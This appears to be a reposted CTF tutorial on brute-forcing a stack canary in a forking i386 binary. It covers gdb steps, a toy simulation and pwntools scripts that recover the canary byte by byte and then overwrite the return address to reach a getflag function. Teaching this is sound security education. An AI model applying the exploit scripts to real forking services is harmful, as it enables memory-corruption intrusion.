Canary learning (brute-forcing the Canary)

Principle of brute-forcing the Canary byte by byte

  • Although a process gets a new canary every time it is restarted, the canary is the same in every thread of one process, and a child created with fork() has the same canary as its parent, because fork() copies the parent's memory as-is.
  • The least significant byte of the canary is 0x00. Brute-forcing the remaining bytes one at a time: if the guess is wrong, the child crashes; if the guess is right, the program continues with its normal logic. That difference tells us whether each guess succeeded.
  • Using these properties, we can brute-force the whole canary byte by byte.
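The principle above as a self-contained simulation (added here, not code from the original post, and no real binary involved): a toy forking server whose children inherit one canary, the byte-by-byte oracle run against it, and the same oracle run against a server that draws a fresh canary per child, where the linear search stops working. The server model, seed and names are constructed for this example.

```python
import random

CANARY_LEN = 4  # 32-bit target, as on the page; the low byte is always 0x00


class ForkingServer:
    """Toy model of a fork()-based service (constructed for this example).
    The parent picks one canary at start-up and every child inherits it
    unchanged, the weakness described above. With rerandomize=True each
    child draws its own canary instead, modelling the mitigation."""

    def __init__(self, seed, rerandomize=False):
        self.rng = random.Random(seed)  # seeded so the run is reproducible
        self.rerandomize = rerandomize
        self.canary = self._fresh_canary()

    def _fresh_canary(self):
        # Low byte is 0x00 so the canary also stops runaway string copies.
        return b"\x00" + bytes(self.rng.getrandbits(8) for _ in range(CANARY_LEN - 1))

    def handle(self, guess):
        """One child serves one request: True if the overflow left the guessed
        prefix intact (the 'success' path), False if the child crashed."""
        canary = self._fresh_canary() if self.rerandomize else self.canary
        return canary[: len(guess)] == guess


def recover_canary(server):
    """Byte-by-byte oracle: extend the known prefix by the first byte the
    child survives. Returns (canary, attempts); canary is None on failure."""
    known = b"\x00"
    attempts = 0
    while len(known) < CANARY_LEN:
        for b in range(256):
            attempts += 1
            if server.handle(known + bytes([b])):
                known += bytes([b])
                break
        else:
            return None, attempts  # no byte survived: the oracle is not stable
    return known, attempts


if __name__ == "__main__":
    weak = ForkingServer(seed=7)
    value, n = recover_canary(weak)
    print(f"inherited canary {weak.canary.hex()} recovered as {value.hex()} "
          f"in {n} tries (at most {3 * 256}; blind search needs up to {256 ** 3})")
    hardened = ForkingServer(seed=7, rerandomize=True)
    value, n = recover_canary(hardened)
    print("per-child canary: recovered", value, "but a fresh child accepts it:",
          value is not None and hardened.handle(value))
```

Against the inherited canary the search is linear (at most 3 * 256 guesses); against per-child canaries a "success" reply only reflects that one child, so whatever prefix is collected does not survive the next fork.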

Example

Canary protection is enabled.

The IDA disassembly shows that the program calls fork(), so the canary may be brute-forceable.

The stack overflow is in the function fun.

Debug dynamically to find the offsets.

Set a breakpoint at the function call below fork().

Set the second breakpoint where the canary is pushed.

gdb bin1
b *0x0804874B
b *0x0804870C
r
set follow-fork-mode child    # follow the child process
c
telescope $esp 35
In the stack dump you can see the canary.
  • From it you can work out the offset between the canary and EBP;
  • likewise the offset between buf and EBP.

Write the exploit and brute-force the canary

from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'bash', '-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    libc = elf.libc
else:
    p = remote('',)   # remote host and port are left blank in the original
    libc = ELF('./')  # remote libc path is left blank in the original

# Python 3 pwntools: all I/O is bytes
p.recvuntil(b'welcome\n')
canary = b'\x00'            # the low byte of the canary is always 0x00
for k in range(3):          # three remaining bytes on i386
    for i in range(256):
        print("byte " + str(k) + ": " + hex(i))
        # 100 bytes of padding reach the canary; send the known prefix plus one guessed byte
        p.send(b'a' * 100 + canary + bytes([i]))
        a = p.recvuntil(b"welcome\n")
        print(a)
        if b"sucess" in a:  # the child survived, so the guessed byte is correct
            canary += bytes([i])
            print("canary: " + canary.hex())
            break

Then send the payload with the address of the getflag function.

from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-x', 'bash', '-c']
context(arch='i386', os='linux')
local = 1
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    libc = elf.libc
else:
    p = remote('',)   # remote host and port are left blank in the original
    libc = ELF('./')  # remote libc path is left blank in the original

# Python 3 pwntools: all I/O is bytes
p.recvuntil(b'welcome\n')
canary = b'\x00'            # the low byte of the canary is always 0x00
for k in range(3):          # three remaining bytes on i386
    for i in range(256):
        print("byte " + str(k) + ": " + hex(i))
        # 100 bytes of padding reach the canary; send the known prefix plus one guessed byte
        p.send(b'a' * 100 + canary + bytes([i]))
        a = p.recvuntil(b"welcome\n")
        print(a)
        if b"sucess" in a:  # the child survived, so the guessed byte is correct
            canary += bytes([i])
            print("canary: " + canary.hex())
            break

addr = 0x0804863B  # address of getflag, taken from the disassembly
# padding to the canary, the recovered canary, 12 bytes up to and including saved EBP, then the return address
payload = b'A' * 100 + canary + b'A' * 12 + p32(addr)

p.send(payload)
p.interactive()

Origin blog.csdn.net/AcSuccess/article/details/104119680